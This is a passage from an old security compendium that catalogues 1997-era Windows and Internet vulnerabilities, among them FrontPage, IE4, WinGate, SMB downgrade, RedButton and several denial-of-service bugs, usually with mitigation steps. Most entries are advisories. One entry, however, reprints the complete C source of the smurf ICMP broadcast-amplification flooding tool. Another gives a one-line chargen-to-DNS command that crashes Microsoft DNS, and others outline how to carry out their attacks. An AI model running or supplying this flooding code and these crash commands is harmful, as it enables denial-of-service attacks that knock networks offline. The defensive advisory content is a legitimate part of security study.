9451became a problem. Right? Wrong. This was a gaping hole waiting to be discovered. It would have
9452almost certainly been discovered sooner or later regardless of source availability; better sooner
9453than later. I certainly hope that Microsoft doesn't think the lesson in this is that source should not
9454be released. It is insecure with or without the source. The FrontPage server extensions aren't
9455going to find their way anywhere near any machines I control any time soon because I have no
9456trust in the company behind them.
9457On a side note, Microsoft actually modifies the server name returned to clients when the
9458FrontPage patches are installed in Apache to include "FrontPage/x.x.x". That is fine, however it
9459gives anyone connecting to your server the ability to determine the chances of them being able to
9460break into your system using holes in the FP server extensions.
9461
9462[13.0.4] TCP/IP Flooding with Smurf
9463
9464Found by TFreak (from ntsecurity.net)
9465
9466The Problem
9467The smurf attack is quite simple. It has a list of broadcast addresses which it stores into an array,
9468and sends a spoofed ICMP echo request to each of those addresses in series and starts again.
9469The result is a devistating attack upon the spoofed IP. Depending on the amount of broadcast
9470addresses used, many, many computers may respond to the echo request.
9471This attack can EASILY saturate a T1 circuit, rendering it completely useless.
9472HERE IS THE SMURF SOURCE CODE:
9473* $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $*
9474* spoofs icmp packets from a host to various broadcast addresses resulting
9475* in multiple replies to that host from a single packet.
9476* disclaimer:
9477* I cannot and will not be held responsible nor legally bound for the
9478* malicious activities of individuals who come into possession of this
9479* program and I refuse to provide help or support of any kind and do NOT
9480* condone use of this program to deny service to anyone or any machine.
9481* This is for educational use only. Please Don't abuse this.
9482* TFreak
9483*/
9484#include <signal.h>
9485#include <stdio.h>
9486#include <stdlib.h>
9487#include <sys/socket.h>
9488#include <sys/types.h>
9489#include <netinet/in.h>
9490#include <netinet/ip.h>
9491#include <netinet/ip_icmp.h>
9492#include <netdb.h>
9493#include <ctype.h>
9494#include <arpa/inet.h>
9495#include <unistd.h>
9496#include <string.h>
9497void banner(void);
9498void usage(char *);
9499void smurf(int, struct sockaddr_in, u_long, int);
9500void ctrlc(int);
9501unsigned short in_chksum(u_short *, int);
9502/* stamp */
9503char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";
9504int main (int argc, char *argv[])
9505{
9506struct sockaddr_in sin;
9507struct hostent *he;
9508FILE *bcastfile;
9509int i, sock, bcast, delay, num, pktsize, cycle = 0, x;
9510char buf[32], **bcastaddr = malloc(8192);
9511banner();
9512signal(SIGINT, ctrlc);
9513if (argc < 6) usage(argv[0]);
9514if ((he = gethostbyname(argv[1])) == NULL) {
9515perror("resolving source host");
9516exit(-1);
9517}
9518memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
9519sin.sin_family = AF_INET;
9520sin.sin_port = htons(0);
9521num = atoi(argv[3]);
9522delay = atoi(argv[4]);
9523pktsize = atoi(argv[5]);
9524if ((bcastfile = fopen(argv[2], "r")) == NULL) {
9525perror("opening bcast file");
9526exit(-1);
9527}
9528x = 0;
9529while (!feof(bcastfile)) {
9530fgets(buf, 32, bcastfile);
9531if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;
9532for (i = 0; i < strlen(buf); i++)
9533if (buf[i] == '\n') buf[i] = '\0';
9534bcastaddr[x] = malloc(32);
9535strcpy(bcastaddr[x], buf);
9536x++;
9537}
9538bcastaddr[x] = 0x0;
9539fclose(bcastfile);
9540if (x == 0) {
9541fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
9542exit(-1);
9543}
9544if (pktsize > 1024) {
9545fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
9546exit(-1);
9547}
9548if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
9549perror("getting socket");
9550exit(-1);
9551}
9552setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));
9553printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
9554for (i = 0; i < num || !num; i++) {
9555if (!(i % 25)) { printf("."); fflush(stdout); }
9556smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
9557cycle++;
9558if (bcastaddr[cycle] == 0x0) cycle = 0;
9559usleep(delay);
9560}
9561puts("\n\n");
9562return 0;
9563}
9564void banner (void)
9565{
9566puts("\nsmurf.c v4.0 by TFreak\n");
9567}
9568void usage (char *prog)
9569{
9570fprintf(stderr, "usage: %s "
9571" \n\n"
9572"target = address to hit\n"
9573"bcast file = file to read broadcast addresses from\n"
9574"num packets = number of packets to send (0 = flood)\n"
9575"packet delay = wait between each packet (in ms)\n"
9576"packet size = size of packet (< 1024)\n\n", prog);
9577exit(-1);
9578}
9579void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
9580{
9581struct iphdr *ip;
9582struct icmphdr *icmp;
9583char *packet;
9584packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
9585ip = (struct iphdr *)packet;
9586icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
9587memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
9588ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
9589ip->ihl = 5;
9590ip->version = 4;
9591ip->ttl = 255;
9592ip->tos = 0;
9593ip->frag_off = 0;
9594ip->protocol = IPPROTO_ICMP;
9595ip->saddr = sin.sin_addr.s_addr;
9596ip->daddr = dest;
9597ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
9598icmp->type = 8;
9599icmp->code = 0;
9600icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);
9601
9602sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,
96030, (struct sockaddr *)&sin, sizeof(struct sockaddr));
9604free(packet); /* free willy! */
9605}
9606void ctrlc (int ignored)
9607{
9608puts("\nDone!\n");
9609exit(1);
9610}
9611unsigned short in_chksum (u_short *addr, int len)
9612{
9613register int nleft = len;
9614register int sum = 0;
9615u_short answer = 0;
9616while (nleft > 1) {
9617sum += *addr++;
9618nleft -= 2;
9619}
9620if (nleft == 1) {
9621*(u_char *)(&answer) = *(u_char *)addr;
9622sum += answer;
9623}
9624sum = (sum >> 16) + (sum + 0xffff);
9625sum += (sum >> 16);
9626answer = ~sum;
9627return(answer);
9628}
9629
9630[13.0.5] SLMail Security Problem
9631
9632Found by David LeBlanc (from ntsecurity.net)
9633
9634David LeBlanc writes:
9635Version 2.5 (current version) is vulnerable to a buffer overrun attack on the POP3 service. If the
9636username supplied is too long, the service will fail with a memory exception. To the best of our
9637knowledge, there are no current exploits which can cause remote execution, but given the
9638characteristics of the failure, it seems entirely possible that this could occur. At the very least, it
9639constitutes a denial of service which will require rebooting the server if attacked. We notified
9640Seattle Lab of this problem two months ago, and they did not seem to understand the severity of
9641the problem.
9642Stopping the Problem:
9643Upgrade to version 2.6
9644
9645[13.0.6] IE 4.0 and DHTML
9646
9647Found by Ralf Hueskes (ntsecurity.net)
9648
9649The Problem
9650A dangerous security hole in Internet Explorer 4.0 was detected by Ralf Hueskes of Jabadoo
9651Communications when he conducted a series of security tests for C'T computer magazine.
9652His tests revealed that it is possible to spy on the contents of any text and HTML files on
9653somebody else's computer. Not only local files are in danger, but also data on your company's
9654intranet - even if it is protected by a firewall.
9655The security hole exists even if users have activated the highest security level in their browser.
9656The problem affects both the German and the English version of the Internet Explorer.
9657The code needed for infiltrating your files can be hidden in any normal Web page or in an e-mail
9658message.
9659Technical Details
9660The spy pages make use of JScript. If a user accesses a page or receives an e-mail containing
9661this code, infiltration begins ...
9662The spy page contains a so-called IFRAME sized 1 by 1 pixel. When a user accesses the page or
9663opens the e-mail message, a small Jscript program loads the HTML or text file to be spied on into
9664this frame. The contents of the frame can then be read using Dynamic HTML and sent as a
9665parameter hidden in a URL to any Web server in the Internet.
9666Protective Measures
9667According to Ralf Hueskes of Jabadoo Communications, the security hole exploits an error in the
9668Internet Explorer 4.0 that can be fixed only by the manufacturer. Microsoft is aware of the
9669problem and will make available a patch for download from http://www.microsoft.com/ie/ on
9670October 17th 1997.
9671Experienced users can protect themselves by completely deactivating the execution of Active
9672Scripting in the security settings (menu item: Tools/Options/Security, Settings/Custom (for expert
9673users)/Active Scripting/Disable) and by using the Security Zones feature in Internet Explorer 4.0.
9674
9675[13.0.7] 2 NT Registry Risks
9676Found by David LeBlanc (ntsecurity.net)
9677
9678
9679The Problem
9680The attack was described most adequated in the ISS X-Force Security Advisory:
9681ISS Security Alert
9682October 21, 1997
9683Scheduler/Winlogin Keys have Incorrect Permissions
9684This advisory describes two similar configuration problems in the Windows NT Registry key
9685permissions. These vulnerabilities can allow users with Server Operator privilege to increase their
9686access level to Administrator.
9687Problem 1: Scheduler Key Has Incorrect Permissions
9688Affects: Windows NT
9689Description: The HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Schedule key
9690controls the schedule service. Server Operators have permission to write to this registry tree,
9691which would allow them to manually schedule jobs to be run by the schedule service, which
9692normally executes under the system user context. This can be used to raise the Server
9693Operator's access level to Administrator.
9694Risk: Medium
9695Solution: Local Machine (GUI): From the Start menu, choose 'Run.' Type 'regedt32' and click
9696'OK.' This opens the Registry Editor. Through the Security menu, remove write access to the
9697Schedule key for Server Operators.
9698Problem 2: Winlogon Key Has Incorrect Permissions
9699Affects: Windows NT
9700Description: The
9701HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon key has two
9702values which can be used to cause a process to execute upon either system bootup, or when a
9703user logs on. The programs pointed to by the System value run under the system user context
9704after boot, and could be used to change a user's rights or access level. The UserInit value runs
9705applications when a user logs in. The default settings for this key allow Server Operators to write
9706these values, either of which could be used to raise a System Operator's access level to
9707Administrator.
9708Risk: Medium
9709Solution: Local Machine (GUI): From the Start menu, choose 'Run.' Type 'regedt32' and click
9710'OK.' This opens the Registry Editor. Through the Security menu, remove write access to the
9711Winlogon key for Server Operators.
9712================================
9713Caution: Care must be taken when using the Registry Editor. If incorrect values are entered, the
9714system may become inoperable. Should a mistake be made when editing the registry values, the
9715registry state can be restored to the state at the last time the system booted up. For more
9716information, see the Windows NT Help under the "Registry" section.
9717================================
9718Acknowledgments: This problem was identified by David LeBlanc of ISS (dleblanc@iss.net).
9719
9720[13.0.8] Wingate Proxy Server
9721Found by Bill Mattocks
9722
9723
9724The Problem
9725The attack was described most adequated by the person reporting it to us, Bill Mattock:
9726A recent hole has been discovered in the default security settings of a popular Windows 95 /
9727Windows NT proxy server called WinGate, by Deerfield Communications:
9728This bug was discovered by a 15-year-old hacker, Joshua E. Rodd, whose e-mail address is
9729jerrod@ibm.net
9730As a semi-well-known anti-spammer, I am active in the Usenet newsgroup known as
9731news.admin.net-abuse.email. Recently, we anti-spammers came under attack by person or
9732persons unknown, who was sending us a variety of hateful e-mail, seemingly from different dialup
9733ISP ports around the world.
9734I was fortunate enough to observe two such attacks in progress, and I telnetted to the IP
9735addresses indicated by the headers on the e-mail messages. In each case, I was greeted by a
9736"WinGate>" prompt, although the IP addresses were different.
9737Apparently, a number of other anti-spammers got the same "hate" e-mail, and notified the ISP
9738that the e-mail appeared to be coming from - in at least one case, a dialup user lost their access
9739because of the complaints.
9740Because I had seen a "WinGate" prompt at two different IP addresses were the attacks seemed
9741to be originating from, I decided to do a little digging. I discovered that the text of the message
9742contained some mispellings that were unusual. I used DejaNews to search for those mispellings,
9743in conjunction with the word "WinGate." I thereby discovered young Mr. Rodd.
9744He had discovered this bug, had written an exploit for it, and had written a netscanner which
9745would comb a specified netblock looking for vulnerable WinGate hosts. He managed to find that if
9746one telnets to a WinGate host that is not properly secured (which was, until a week or so ago, the
9747default state of these servers), one could telnet into and then back out of the WinGate server,
9748which would "launder" one's actual IP address. Thereafter, if one mounted an attack on another
9749machine, or if one sent e-mail by "hijacking" an open SMTP server, one would seem to be coming
9750from the location of the WinGate server. This exploit was used to harass anti-spammers with
9751untraceable e-mail, but one could well imagine that it could be used for a variety of other attacks.
9752It is easy to see that this type of IP laundering would be simpler to perform than IP spoofing, and
9753nearly as bulletproof in terms of being untraceable.
9754Joshua has, unfortunately, disseminated his hacking tools far and wide by now, as he was quite
9755proud of his abilities.
9756This information has been reported by C/Net news last week, and has been given to Deerfield
9757Communications as well. Michael Deerfield is the CEO of the corporation, and he is quite
9758concerned, but he is also understandably quite concerned about the potential publicity damage to
9759his company. He was initially a bit hostile, posting messages in Usenet news to the effect that this
9760type of "wide open" behaviour of his WinGate Proxy server was "by design," and was totally
9761secure. He failed to immediately grasp that although the INTERIOR of the proxy server probably
9762is safe from attack, the rest of the Internet is not safe from this exploit, which would result in
9763fingers of blame being pointed back at his innocent clintele, and then eventually to WinGate.
9764WinGate has indicated that this "bug," which they still claim is not a bug, has been repaired in the
9765newest version of WinGate, v2.0. However, WinGate is available as shareware, and Deerfield
9766Communications has estimated that there are hundreds of thousands of copies of the older
9767software in circulation. Deerfield HAS placed simple instructions on disabling telnet on their web
9768page, with a quick description of why a sysadmin would want to do so.
9769This information has been reported to CERT at cert@cert.org, however, they have not responded
9770at this time, and it has been nearly two weeks since I reported it. Vint Cerf has also been notified,
9771and he assigned an MCI security person to look into it, and that person has not responded to me
9772at this time, either (after an initial e-mail message, that is).
9773As this is not an exploit designed to penetrate a network, nor is it an Denial of Service attack, I
9774believe that many people are pooh-pooh'ing the incident, and I have heard comments to the
9775effect that "all firewalls and proxy servers are like that." Perhaps so, but I only know of this one at
9776this time.
9777
9778[13.0.9] O'Reilly Website uploader Hole
9779Found by Herman deVette
9780
9781
9782Systems running Website(c) with uploader.exe in place are vulnerable. Website ships with a
9783program called UPLOADER.EXE that allows compatible Web clients to upload files to the Web
9784server. Using the UPLOADER.EXE application with a modified HTML page will allow an attacker
9785to upload an file the attacker wishes.
9786
9787The following is from Herman:
9788"The program uploader.exe doesn't check anything at all. If you're lucky, you're running Windows
9789NT and have put only "read/execute access" on CGI-WIN and other executable paths. Otherwise
9790(win95) you have a real problem. You could create a CGI program, next you change the HTML
9791file a little like this.
9792Open the HTML file in your browser, select a nice CGI file to upload and run that CGI program
9793remotely. (No need to tell you what this CGI program could do, could be .bat file too in one of
9794Website's other CGI directories)"
9795Herman de Vette
9796To Stop the problem, get rid of the uploader.exe application and ftp your information.
9797
9798[13.1.0] Exchange 5.0 Password Caching
9799Found by Rajiv Pant
9800
9801
9802Exchange 5.0 Server's POP3 service has a bug in it that causes the system to not properly flush
9803cached passwords. Old passwords will continue to be valid along with newly set passwords. This
9804problem will persist until the cache is flushed. David LeBlanc points out that Microsofts FTP,
9805HTTP,and Gopher service also suffer from the same problem. The problem does not affect NT
9806logins themselves.
9807To correct the problem, you must edit the following registry keys:
9808HKLM\System\CurrentControlSet\Services\MsExchangeIs\ParametersNetIf\Credentials
9809Cache Age Limit (Default = 120 minutes)
9810HKLM\System\CurrentControlSet\Services\MsExchangeIs\ParametersNetIf\Credentials
9811Cache Idle Limit (Default = 15 minutes)
9812HKLM\System\CurrentControlSet\Services\MsExchangeIs\ParametersNetIf\Credentials
9813Cache Size (Default = 256 buckets)
9814Make the settings = 0
9815
9816[13.1.1] Crashing NT using NTFS
9817Found by Martin Stiemerling
9818
9819
9820Affects NT systems running Service Pack 3 also.
9821Recently, a program released from Germany (crashnt.exe) seems to be able to crash an NT
9822server. The program was coded by Martin Stiemerling. It executes in a command window and
9823functions off of one parameter, a drive letter. (example: crash d:). It seems that the program may
9824be a spawn of an NT Defragmentation program. The fact that this program will crash and render
9825an NTFS volume useless is spooky.
9826David LeBlanc says he thinks this may be a result of something in the NtFsControlFile() function.
9827
9828[13.1.2] The GetAdmin Exploit
9829Found by Konstantin Sobolev
9830
9831
9832The GetAdmin program originated in Russia and has the ability to add users to the Administrators
9833group. No special permissions are needed to execute the program, which interestingly runs
9834through a telnet session as well. Microsoft released a patch that they said stops the attack. If
9835however, you run crash4.exe on the server first and then run GetAdmin, the exploit still works. (All
9836of the executables discussed here are available in the tools section.)
9837
9838[13.1.3] Squid Proxy Server Hole
9839Found by Fred Albrecht
9840
9841
9842If someone FTP's into site via URL, the password the user uses could possibly be recovered from
9843NetScape Communicator or from the logs of the Squid Proxy server (versions 1.1.10 and 1.1.11).
9844-- Excerpt from ntsecurity.net
9845Method for testing:
98461. Start NS Communicator 4.0
98472. Enter a URL of the form "ftp://user@host.domain.xxx"
98483. Communicator pops up a password entry dialog. Enter the password.
98494. When the file list is displayed in the browser window, follow the "Parent Directory" link
98505. Click the BACK button (seems to be optional in Linux)
9851
9852The password is now plainly visible in the URL field, similar to the following:
9853"ftp://user:passwd@host.domain.xxx"
9854We'll explain this out a bit clearer below:
9855Normally, if a site allows anonymous FTP, this means you don't need a username and password
9856pair to login. You just use "anonymous" and your email addr for the password and you're in -
9857which is handled transparently by your browser when used for FTP access. But if the site is
9858regulated, and requires a username password pair, then you'd be prompted by Communicator 4.0
9859if, and only if, you used Communicator to FTP to that protected site.
9860Let's say you want to FTP to a site which is protected. You'd enter a URL like this:
9861"ftp://yourname@ftp.someftpsite.com - at which point Communicator connects to the site, and
9862pops up a window asking you to enter your password that matches the "yourname" user account.
9863You enter the password, click OK, and it sends it to the site for authentication. BUT, IT ALSO
9864PUTS IT IN THE HISTORY FILE OF COMMUNICATOR in this format:
9865"ftp://yourname:password@ftp.someftpsite.com".
9866So you can see, in the beginning, the URL did not have the password included. But, once you
9867enter the password using Communicator 4.0, it gets added to the URL and put in the history file.
9868Therefore, anyone with access to your Communicator would have access to your history file, and
9869thus, the stored passwords - should there be any.
9870Be aware that it has been reported that JavaScript can access the history list, meaning a
9871malicious Web page could be grabbing passwords from your browser without your knowledge.
9872ALSO - it appears that the Squid Proxy Server is in fact writing the user's password in plain text to
9873its own logs as well - which we should all know is a bad thing.
9874Netscape says the root of the problem lies in the Squid Proxy, not Communicator.
9875
9876Stopping the Attack : Don't use Communicator for FTP'ing to sites that require a username and
9877password. Use a standalone FTP client instead, until Netscape releases a fix.
9878
9879[13.1.4] Internet Information Server DoS attack
9880Found by Todd Fast
9881
9882You can crash an IIS box by sending a large URL to it (4-8K). --To Quote ntsecurity.net According
9883to Microsoft personnel, "it's a very specific boundary condition when parsing the headers. The
9884end of a token (method, URL, version or header) must be exactly at 8k, followed by a second
9885token. Our max header buffer is 8k, anything beyond gets thrown out as an invalid request. In this
9886particular scenario, an index gets misinterpreted as a pointer so we deref 0x00002000 which lo'
9887and behold, doesn't exist."
9888Stopping the Attack : Load the patch available from microsoft.
9889
9890
9891[13.1.5] Ping Of Death II
9892Found By Jiva DeVoe
9893
9894
9895In keeping with the tradition of the first ping of death, Ping Of Death II (Or SPing) sends multiple
989664k packets, which still become fragmented and will cause a windows system to lock up
9897completely.
9898Stopping the Attack : Block all inbound ICMP traffic.
9899
9900[13.1.6] NT Server's DNS DoS Attack
9901--From ntsecurity.net
9902
9903
9904Microsoft DNS can be made to crash by redirecting the output of the Chargen service to the MS
9905DNS service. A typical attack might be launched from a system using the following command:
9906$ telnet ntbox 19 | telnet ntbox 53
9907The above command is shown as seen on a UNIX command line. Once the command is issued,
9908a telnet session is opened on port 19 (chargen) of the ntbox, and all output is redirected to a
9909second telnet session opened on port 53 (dns) of the same ntbox. Launching the attack in this
9910manner may subject the attacker to the same barrage of packets the DNS service will experience.
9911But none-the-less, the attack is successful in crashing MS DNS.
9912Stopping the Attack : Stopping the attack is done by performing one of the following:
9913Don't run MS DNS until it's proven to be less bug ridden. Instead, you may opt for running a free
9914version of BIND for NT which is not subject to this attack. If you rely on MS DNS interoperating
9915with WINS, you may opt for MetaInfo's DNS, which is a direct BIND port and works great in
9916conjunction with WINS. If you must go on using MS DNS, be forewarned that it may be incredibly
9917difficult to stop this attack, since it can be done through impersonation and by using non-standard
9918ports for chargen.
9919You can block port TCP port 53 using NT's built-in TCP/IP filtering. This stops zone transfers and
9920TCP based name resolutions. This does not stop the UDP port 53 from continuing to operate
9921normally. DNS normally relies on UDP for its name resolution transactions.
9922Or, you can filter TCP port 53 on your routers to bordering networks, allowing only trusted
9923secondary DNS servers to do zone transfers.
9924Any one of the above three solutions should help you stop the attack cold.
9925This type of attack (pointing chargen output to other ports) can go along way towards bogging
9926down lots of services, some of which die like MS DNS. You'd be well advised to disable NT's
9927Simple TCP/IP Services (if installed) using Control Panel | Services. This stops the chargen,
9928echo, daytime, discard, and quote of the day (qotd) services. Any of which could be used for
9929denial of service attacks. None of these services are required for proper network operation -
9930although you should be aware that a few types of network monitors occasionally test the echo
9931port when they cannot get a response using ping. If you find the need to run one or more of these
9932services independant of the others, you can turn on/off each respective service by adjusting
9933Registry entries found in the following subtree:
9934HKEY_LOCAL_MACHINE\CurrentControlSet\Services\SimpTcp\Parameters
9935By changing the established value of both the EnableTcpXXXX and EnableUdpXXXX parameters
9936from 0x1 to 0x0, you effectively disable that particular service.
9937The following parameters are available for adjustment:
9938EnableTcpChargen
9939EnableTcpDaytime
9940EnableTcpDiscard
9941EnableTcpEcho
9942EnableTcpQotd
9943EnableUdpChargen
9944EnableUdpDaytime
9945EnableUdpDiscard
9946EnableUdpEcho
9947EnableUdpQotd
9948BE CAREFUL WHEN MAKING REGISTRY CHANGES, AS ERRORS CAN RENDER A SYSTEM
9949NON-BOOTABLE.
9950Keep in mind that this does not stop attacks that originate from other system's chargen ports, nor
9951will it stop impersonated port attacks.
9952
9953[13.1.7] Index Server Exposes Sensitive Material
9954Found by Andrew Smith
9955
9956
9957One of the components of Index Server (which is the internal search engine component thats part
9958of Internet Information Server.) can expose material of a highly sensitive nature. This component,
9959webhits.exe allows the web server to read files it would normally not be able to read. If the
9960administrator of the server has left the default sample files on IIS, a hacker could easily have the
9961ability to narrow their searches for usernames and passwords. Once an intruder has located an
9962IIS box that has these default samples still on the server, the intruder can use the sample search
9963page to specify only files that have the word password in them and are script files.
9964The URL the hacker would try is http://servername/samples/search/queryhit.htm then the hacker
9965would search with something like "#filename=*.asp"
9966When the results are returned not only can one link to the files but also can look at the "hits" by
9967clicking the view hits link that uses the webhits program. This program bypasses the security set
9968by IIS on script files and allows the source to be displayed.
9969The default path to webhits.exe is:
9970http://servername/scripts/samples/search/webhits.exe
9971Stopping the Attack : Remove webhits.exe or move it from its default location.
9972
9973[13.1.8] The Out Of Band (OOB) Attack
9974This is a DoS attack that affects NT and 95 machines alike.
9975--To Quote ntsecurity.net
9976
9977
9978How it Works:
9979The attack is done by sending Out of Band (OOB) data to an established connection. NetBIOS,
9980which listens on port 139 among others, seems to be the most affected - but the attack may work
9981against MS-DNS running on port 53, causing massive Event Log entries related to "select()
9982errors", as reported by David LeBlanc. Apparently the OS doesn't know how to handle OOB data
9983properly, so it may panic, causing strange things to happen. NT displays the Blue Screen of
9984Death (BSOD) indicating TCPIP.SYS as the cuplrit, and definately requires a reboot after being
9985attacked. Windows 95 may or may not crash completely, but always presents a blue exception
9986screen, indicating MSTCP and NDIS as the culprits. Win95 always stops talking on the network
9987after the attack.
9988STOPPING THE ATTACK:
9989Block inbound access to port 139 at your router. Alternatively you can stop the server service on
9990NT systems, but this renders the box unable to share objects such as printers and directories.
9991You may also use the built-in NT TCP/IP filtering to block non-local network access to port 139.
9992In regards to Windows 95 machines, the only way right now to disable port 139 is to unload
9993network drivers completely, or use a packet filter to block traffic to port 139 on that machine, as
9994mentioned above.
9995
9996[13.1.9] SMB Downgrade Attack
9997
9998May 6, 1997 - 3pm CST [NTSD] - On the heals of April's RedButton exploit comes yet another
9999demonstration of attacking NT networks. A new program has just been released, complete with
10000source code, that will downgrade a Server Message Block (SMB) negotiation - the standard
10001handshake that occurs when a client attempts to connect to an NT Server. Downgrading the
10002authentication causes the client to send its password in clear text, unencrypted - Ouch. This has
10003been a known possibility for quite some time, however no one has released a working program
10004along with source code up until now.
10005The program actually runs on a Windows based system loaded with Novell ODI style drivers
10006running in promiscuous mode. Once active, the software listens for SMB negotiations, and upon
10007detecting one, the software sends a single packet to the client instructing it to downgrade its
10008connection attempt to a clear text level - at which point the client silently obeys by sending its
10009password in clear readable text. Once this happens this little piece of software actually grabs the
10010password as it travels over the wire and displays it on the screen. The client is successfully
10011connected to the NT Server, and the user remains none-the-wiser that its password has just been
10012grabbed.
10013Under Windows networking, when a client creates a new connection to an NT Server, the clients
10014can be instructed to use a particular authentication mechanism: clear-text or challenge/response.
10015As a result, clients can be instructed to transmit their password in clear text form very easily.
10016Furthermore, if an NT Server requested an encrypted login from the client, NT will authenticate
10017the client, even if the client submits the password in clear text after being told to send an
10018encrypted challenge/response answer. To make matters worse, there is no indication that this is
10019taking place, and there is no way to provide an audit trail on the NT Server that indicates the
10020clients are using clear-text passwords - even though the server has requested encrypted
10021authentication. Perhaps NT should in fact be capable of logging an audit trail on this type of
10022activity (hint hint).
10023A result of this design characteristic, a rogue client could sit on your network silently listening for
10024username and password pairs traveling across the network during authentication. No physical
10025access or user rights and permissions are required for this attack to work! All that's need is a
10026connection to your network between the clients and servers.
10027As I said, this type of SMB downgrade attack has been a known possibility for quite some time -
10028as noted in the Common Internet File System (CIFS) specification (section 8.5.2) - and similar,
10029although not quite the same types of exploits have been demonstrated recently by various college
10030students attempting to show vulnerabilities in Internet Explorer and Windows NT. Previously, NT
10031LAN Manager negotiation and hostile SMB servers were shown to effectively initiate, intercept, or
10032intervene in certain aspects of the client/server authentication process.
10033The person bringing this new program to our attention, David Loudon, has suggested that,
10034"Microsoft could initially create a server patch that would not allow the NT Server to accept clear
10035text passwords. While this does not prevent the exposure of the clear-text password, at least the
10036administrator would be alerted that clients were sending clear-text passwords when requested to
10037send encrypted passwords. To completely resolve this issue, all Microsoft networking clients must
10038be replaced with new code that would never send clear text passwords during the authentication
10039process.
10040"As long as Microsoft networking is enabled on any DOS, Windows 3.1, Windows for
10041Workgroups, Windows 95, or Windows NT clients, users are susceptible to disclosing their clear
10042text passwords to other devices on the physical network. Resolving this issue requires an
10043administrator to update the Microsoft networking components on all affected desktops as soon as
10044a fix is available from Microsoft."
10045Microsoft is definitely aware of this issue, and it appears that this type of functionality was
10046knowingly put in place in order to remain backward compatible with older Microsoft clients like
10047DOS. As a result, don't expect to see a fix for this until Service Pack 3 comes out, and maybe
10048even later.
10049The new CIFS Authentication proposal seems to address this issue and a few other potential
10050nasty security problems, but there is no guarantee the new CIFS specs will make it into SP3 yet.
10051The probable outcome is that the new CIFS Authentication specification, which is being hashed
10052out in a public forum on the Internet, will contain newfound configuration switches that can force
10053the client and/or servers to require either clear text or encrypted negotiations.
10054
10055[13.2.0] RedButton
10056--From ntsecurity.net
10057
10058A new program was released this weekend that allows ANYONE with remote access to an NT
10059server (using ports 137, 138, and 139) to connect to that machine, read the registry, and create a
10060new share accessible to the Everyone group. This is a SERIOUS problem that should be guarded
10061against at all costs. A quick test of this new RedButton program shows that it does in fact connect
10062to a remote NT system.
10063Administrators should seriously consider blocking access to ports 137, 138, and 139 on any
10064machines exposed to the Internet. You can also stop the Server service to protect yourself,
10065although doing so eliminates the ability for that server to share resources.
10066Another consideration is to edit the Registry as follows:
100671. Open HKEY_LOCAL_MACHINE/CurrentControlSet/Control/SecurePipeServers
100682. Create a key called winreg (if it doesn't exist)
100693. Set the security on it however you like, but don't give the Everyone group access - but don't
10070define Everyone with NO ACCESS either as this locks out all accounts.
100714. Reboot the system
10072RedButton was released by MWC, security consultants, who are maintaining a Web page about
10073the new RedButton software at http://www.ntsecurity.com/redbutton. NOTE: This Web address is
10074ntsecurity.com - not associated with NTSD or ntsecurity.net. We are not responsible for content at
10075thier site.
10076RedButton will:
10077* logon remotely to a target computer without presenting a username and password
10078* gain access to the resources available to the Everyone group
10079* determine the current name of built-in Administrator account
10080* read several registry entries and display the information
10081* list all shares - even hidden shares
10082Microsoft released a HOTFIX for the RedButton problems on May 3, 1997. Be CERTAIN to read
10083the Knowledge Base articles and README files in the distribution directory - this software hotfix
10084installs itself without warning so be careful to understand it completely before proceeding.
10085
10086[13.2.1] FrontPage WebBot Holes
10087---From ntsecurity.net
10088
10089Microsoft has uncovered a bug in the Microsoft FrontPage Server Extensions that allow
10090knowledgeable users to potentially add content to pages on a Web site without permission
10091through use of raw HTML. This can only happen if:
10092Someone viewing a Web page has an advanced mastery of HTML
10093The Web site is hosted on a server that contains the FrontPage server extensions
10094A Web page contains a Save Results WebBot Component or a Discussion WebBot Component
10095Since raw HTML is not filtered out of entries made in the entry fields of the Save Results or
10096Discussion WebBot Components, it is possible for a knowledgeable person browsing a site to
10097enter the tags necessary to create a form within these fields. If the results page is then fetched for
10098browsing the newly inserted form will be available for use by anyone browsing the site. The result
10099is that anyone browsing could then append information to pages in the Web site even though they
10100do not have authoring permission.
10101After isolating the bug and replicating it we concluded the best way to address the issue was to
10102create new versions of the FrontPage 97 Server Extensions. These Server Extensions are being
10103made immediately available at no charge to all of our users via download from the FrontPage
10104Web site at http://www.microsoft.com/frontpage/softlib/current.htm. In addition, we are in the
10105process of proactively sending a set of the updated FrontPage 97 Server Extensions to all
10106Internet Service Providers we know of that are currently using the FrontPage Server Extensions,
10107and we will also include them in the Windows NT Server Service Pack 3.
10108This issue came to our attention within the last two weeks from a Microsoft employee creating a
10109Web site with FrontPage. Since then we have been confirming and replicating the error to ensure
10110that it was not an isolated incident. As far as we know, this issue has affected no one outside of
10111Microsoft.
10112This bug affects Web sites created with FrontPage 1.1 for Windows and FrontPage 97 with
10113Bonus Pack for Windows that are hosted on Web servers with any version of the FrontPage
10114Server Extensions installed. However, it only affects those sites that contain the WebBot
10115components described above.
10116Any web server with the FrontPage 97 or 1.1 Server Extensions installed and active FrontPage
10117webs with the WebBots specified above are potentially at risk. If the server has server-side
10118include capability enabled then the potential exposure is higher. However, server-side includes
10119are a Web server feature that should be carefully evaluated by any Internet server owner
10120regardless of whether the FrontPage Server Extensions are installed.
10121This issue is most likely to be a problem for Internet Service Providers who are hosting webs on
